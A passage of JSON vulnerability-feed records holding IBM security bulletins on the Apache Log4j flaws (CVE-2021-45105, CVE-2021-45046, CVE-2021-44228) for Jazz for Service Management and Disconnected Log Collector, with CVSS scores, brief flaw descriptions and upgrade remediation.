Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSEKCU\",\"label\":\"Jazz for Service Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.1.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-10T16:52:58", "type": "ibm", "title": "Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-10T16:52:58", "id": "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "href": "https://www.ibm.com/support/pages/node/6536710", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:32", "description": "## Summary\n\nApache Log4j is used by IBM\u00ae Disconnected Log Collector to log system events. This bulletin provides a remediation for the vulnerabilities, CVE-2021-45105 and CVE-2021-45046 by upgrading IBM\u00ae Disconnected Log Collector and thus addressing the exposure to the Apache Log4j vulnerabilities. The fix includes includes Apache Log4j v.2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Disconnected Log Collector| v1 - v1.7.1 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now, refer to [IBM Disconnected Log Collector v1.7.2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=DLC-1.7.2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Disconnected Log Collector v1.7.2\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBQAC\",\"label\":\"IBM QRadar SIEM\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.7.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImp